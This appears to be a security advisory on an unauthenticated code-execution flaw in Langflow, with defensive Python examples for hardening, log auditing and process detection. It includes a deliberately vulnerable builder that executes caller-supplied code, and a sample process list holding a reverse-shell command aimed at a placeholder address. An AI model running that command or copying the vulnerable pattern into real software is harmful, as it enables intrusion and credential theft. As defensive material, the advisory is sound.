The Vulnerability
CVE-2026-33017 is an unauthenticated remote code execution flaw in Langflow, the widely used open-source visual platform for building AI agent pipelines and LLM workflows. The vulnerability exists in the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint, a feature designed to allow unauthenticated users to build and run public flows.
The flaw arises because the endpoint accepts attacker-supplied flow data containing arbitrary Python code in node definitions, which Langflow executes server-side without any sandboxing. No credentials, no authenticated session, no user interaction — an unauthenticated HTTP request is sufficient to achieve code execution on the underlying server.
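To make the pattern concrete, the following is an added illustration written for this page, not Langflow's own code: a hypothetical flow builder that executes Python source carried in node definitions, beside a hardened version that only instantiates pre-registered component types. The node schema (an "id", a "type", optional "params" and an optional "code" field) and the component registry are assumptions for the illustration.

```python
# Added illustration of the unsafe pattern described above, with a hardened
# counterpart. Example code written for this page; NOT Langflow's
# implementation. The node schema and the REGISTRY contents are assumed.
from typing import Any, Callable

# Assumed allow-list of vetted, pre-registered components, keyed by node type.
REGISTRY: dict[str, Callable[..., Any]] = {
    "text_input": lambda value="": value,
    "uppercase": lambda value="": str(value).upper(),
}


def build_flow_unsafe(flow: dict) -> dict[str, Any]:
    """Vulnerable pattern: a node that carries a "code" field has that source
    exec()'d inside the server process. Whoever can reach the endpoint runs
    code with the service account's privileges and environment variables."""
    outputs: dict[str, Any] = {}
    for node in flow.get("nodes", []):
        if "code" in node:
            scope: dict[str, Any] = {}
            exec(node["code"], scope)  # caller-controlled string, no sandbox
            outputs[node["id"]] = scope.get("result")
        else:
            outputs[node["id"]] = REGISTRY[node["type"]](**node.get("params", {}))
    return outputs


def build_flow_safe(flow: dict) -> dict[str, Any]:
    """Hardened pattern: never execute caller-supplied source. Nodes may only
    reference registered component types, and parameters must be a plain
    string-keyed mapping. A caller can compose vetted components but cannot
    define new ones, so a public build endpoint no longer equals code execution."""
    outputs: dict[str, Any] = {}
    for node in flow.get("nodes", []):
        node_id = node.get("id")
        if "code" in node:
            raise ValueError(f"node {node_id!r}: inline code is not accepted")
        component = REGISTRY.get(node.get("type"))
        if component is None:
            raise ValueError(f"node {node_id!r}: unknown component type")
        params = node.get("params", {})
        if not isinstance(params, dict) or not all(isinstance(k, str) for k in params):
            raise ValueError(f"node {node_id!r}: params must be a string-keyed mapping")
        outputs[node_id] = component(**params)
    return outputs


def is_rejected(flow: dict) -> bool:
    """True if the hardened builder refuses the flow (bad schema, unknown
    component, inline code, or parameters the component does not accept)."""
    try:
        build_flow_safe(flow)
    except (ValueError, TypeError):
        return True
    return False
```

The hardened builder does not try to sandbox the code; it refuses to accept code at all. Sandboxing `exec` in-process is not a reliable boundary, so for an endpoint reachable without authentication the only defensible design is one in which the request can select and wire components but never supply their implementation.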
CVSS base score: 9.3 (Critical). All Langflow versions through 1.8.1 are affected. The fix is version 1.9.0.
Exploitation: 20 Hours from Advisory to Attacks
The Sysdig Threat Research Team documented exploitation activity beginning within 20 hours of the vulnerability's public disclosure on 17 March 2026. Critically, no public proof-of-concept code existed at the time: attackers developed working exploits from the advisory description alone.
The observed attack pattern is consistent:
- Unauthenticated attacker sends a crafted POST request to the public flow build endpoint containing an embedded Python payload
- Langflow executes the payload under its service account
- Attacker harvests environment variables and filesystem contents, specifically targeting API keys for OpenAI, Anthropic, Google Gemini, and AWS
- Secondary payloads establish persistent reverse shells or web shells for ongoing access
CISA added CVE-2026-33017 to the Known Exploited Vulnerabilities catalogue on 26 March, confirming sustained active exploitation across internet-exposed instances.
Why AI Pipeline Platforms Are High-Value Targets
Langflow deployments are particularly attractive to attackers for several compounding reasons.
API key concentration. Langflow instances are configured with API keys for the large language model providers and cloud services powering the pipelines. Compromising a single Langflow instance often yields credentials for OpenAI, Anthropic, AWS, Azure, and Google Cloud simultaneously.
Business logic access. Langflow hosts the definitions of an organisation’s AI workflows — proprietary agent configurations, prompt engineering, tool integrations, and automation logic. This represents significant intellectual property beyond the API keys themselves.
Transitive access. Many Langflow deployments are connected to internal databases, file storage, and APIs as data sources for their pipelines. A compromise of the Langflow server can provide lateral access into production data systems.
Lateral movement. Stolen cloud credentials — particularly AWS or Azure keys — frequently have permissions far beyond what was needed for the Langflow integration, enabling attackers to pivot into cloud environments.
Affected Environments
Langflow is deployed across enterprises, AI startups, research institutions, and development teams building AI-powered products. The platform is popular specifically because it enables non-engineers to build and deploy LLM pipelines through a drag-and-drop interface, which means it is frequently deployed by teams without deep security oversight.
Deployments directly exposed to the internet are at highest risk, but any instance reachable from a compromised internal network represents a target once an attacker has an initial foothold.
Recommended Actions
Immediate:
- Upgrade Langflow to version 1.9.0 immediately — this is the only complete fix. There is no workaround that fully mitigates code execution risk while keeping public flow functionality enabled
- Disable the public flow build endpoint if upgrading is not immediately possible: restrict access to /api/v1/build_public_tmp/ at your reverse proxy or firewall
- Rotate all API keys stored in Langflow's environment or configured in flows, and treat them as compromised. This includes OpenAI, Anthropic, AWS, Azure, Google Cloud, and any other service keys present
- Audit Langflow access logs for POST requests to /api/v1/build_public_tmp/ originating from unexpected source IPs
- Remove internet exposure of Langflow admin interfaces: these should sit behind a VPN or a zero-trust gateway, not be directly internet-accessible
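The log audit step above, as an added example written for this page (not a Langflow or vendor tool): it sweeps reverse-proxy access logs in the common "combined" format for POST requests to the public build endpoint from sources outside the networks you expect. The log lines are constructed for illustration (placeholder flow id, TEST-NET addresses), and the expected-source networks are assumed values for an internal deployment.

```python
# Added example for the access-log audit step. Example code written for this
# page, not from Langflow. SAMPLE_LOG is constructed; EXPECTED_SOURCES are
# assumed values to replace with your own ranges.
import ipaddress
import re
from collections import Counter
from typing import Optional

ENDPOINT_PREFIX = "/api/v1/build_public_tmp/"

# Assumed: networks from which public flow builds are legitimately expected.
EXPECTED_SOURCES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.0/24"),
]

# nginx/Apache "combined" format:
# client - user [time] "METHOD path PROTO" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample; "example-flow-id" stands in for a real flow id.
SAMPLE_LOG = """\
10.0.3.7 - - [18/Mar/2026:09:12:01 +0000] "GET /api/v1/flows HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.3.7 - - [18/Mar/2026:09:12:44 +0000] "POST /api/v1/build_public_tmp/example-flow-id/flow HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.45 - - [18/Mar/2026:11:03:19 +0000] "POST /api/v1/build_public_tmp/example-flow-id/flow HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
203.0.113.45 - - [18/Mar/2026:11:03:20 +0000] "POST /api/v1/build_public_tmp/example-flow-id/flow HTTP/1.1" 200 812 "-" "python-requests/2.31.0"
198.51.100.9 - - [18/Mar/2026:11:05:02 +0000] "GET /api/v1/build_public_tmp/example-flow-id/flow HTTP/1.1" 405 0 "-" "curl/8.5.0"
"""


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_expected_source(ip_text: str, expected=EXPECTED_SOURCES) -> bool:
    """A client field that is not an address (e.g. a resolved hostname) is
    treated as unexpected rather than silently skipped."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in expected)


def audit(log_text: str, expected=EXPECTED_SOURCES) -> list:
    """Return every POST to the public build endpoint from an unexpected source."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] != "POST" or not rec["path"].startswith(ENDPOINT_PREFIX):
            continue
        if is_expected_source(rec["ip"], expected):
            continue
        findings.append({"ip": rec["ip"], "time": rec["time"],
                         "path": rec["path"], "status": int(rec["status"])})
    return findings


def by_source(findings: list) -> dict:
    """Hit count per unexpected source IP, useful for prioritising response."""
    return dict(Counter(f["ip"] for f in findings))
```

Two caveats when running this against real logs: if Langflow is fronted by a load balancer, the client field will be the balancer's address and you need the proxy to log X-Forwarded-For (or the equivalent) instead; and a 200 on one of these POSTs means the build ran, so every unexpected hit should be treated as a successful execution until proven otherwise, not as a mere probe.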
Detection:
- Alert on unexpected processes spawned by the Langflow service account
- Monitor for unusual outbound connections from Langflow servers, particularly to external IPs
- Check cloud provider billing dashboards for anomalous API usage (a common indicator of stolen key abuse)
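For the first detection item, the following is an added example written for this page (not Langflow's code and not a vendor detection): it flags processes running as the Langflow service account that are not part of the expected server process tree, and walks each one's parent chain back to the worker that spawned it. The process snapshot is constructed to resemble `ps -eo pid,ppid,user,comm,args` output; the service user name, the expected executables and the install path are assumed values for a typical deployment.

```python
# Added example for the process-spawn detection item. Example code written for
# this page, not Langflow's. PS_SNAPSHOT is constructed; SERVICE_USER,
# EXPECTED_COMMANDS and the paths in the snapshot are assumed values.
from dataclasses import dataclass

SERVICE_USER = "langflow"  # assumed name of the account the service runs as
EXPECTED_COMMANDS = {"python3", "python", "uvicorn", "gunicorn", "langflow"}  # assumed

# Constructed snapshot with a header row (skipped by the parser).
PS_SNAPSHOT = """\
  PID  PPID USER     COMMAND         COMMAND
    1     0 root     systemd         /sbin/init
  812     1 langflow python3         /opt/langflow/.venv/bin/python3 -m langflow run --host 0.0.0.0 --port 7860
  903   812 langflow python3         /opt/langflow/.venv/bin/python3 -m langflow run --host 0.0.0.0 --port 7860
 1044   903 langflow sh              /bin/sh -c bash -i >& /dev/tcp/203.0.113.45/4444 0>&1
 1045  1044 langflow bash            bash -i
 1101   903 langflow env             env
 1200     1 postgres postgres        /usr/lib/postgresql/16/bin/postgres
"""


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    args: str


def parse_ps(text: str) -> dict:
    """Parse the snapshot into a pid -> Proc map; the header row is skipped."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 4:
            continue
        args = parts[4] if len(parts) == 5 else ""
        procs[int(parts[0])] = Proc(int(parts[0]), int(parts[1]), parts[2], parts[3], args)
    return procs


def find_unexpected_children(procs: dict, service_user: str = SERVICE_USER,
                             expected=EXPECTED_COMMANDS) -> list:
    """Every process owned by the service account whose executable is not on
    the expected list. The parent chain is walked up to the nearest expected
    server process so an analyst can see which worker spawned it."""
    service_pids = {p.pid for p in procs.values()
                    if p.user == service_user and p.comm in expected}
    findings = []
    for p in procs.values():
        if p.user != service_user or p.comm in expected:
            continue
        chain, cur, hops = [], procs.get(p.ppid), 0
        while cur is not None and hops < 64:  # hop cap guards against a malformed cycle
            chain.append(cur.pid)
            if cur.pid in service_pids:
                break
            cur, hops = procs.get(cur.ppid), hops + 1
        findings.append({
            "pid": p.pid, "comm": p.comm, "args": p.args,
            "parent_chain": chain,
            "from_service": bool(chain) and chain[-1] in service_pids,
        })
    return findings
```

On a live host, feed it the output of `ps -eo pid,ppid,user,comm,args`. Polling `ps` will miss short-lived children such as a one-shot `env` or `cat`, so in production the same allow-list logic belongs in an execve-level source (auditd, eBPF or your EDR) keyed on the service account's UID; the snapshot approach is for triage of a host you already suspect.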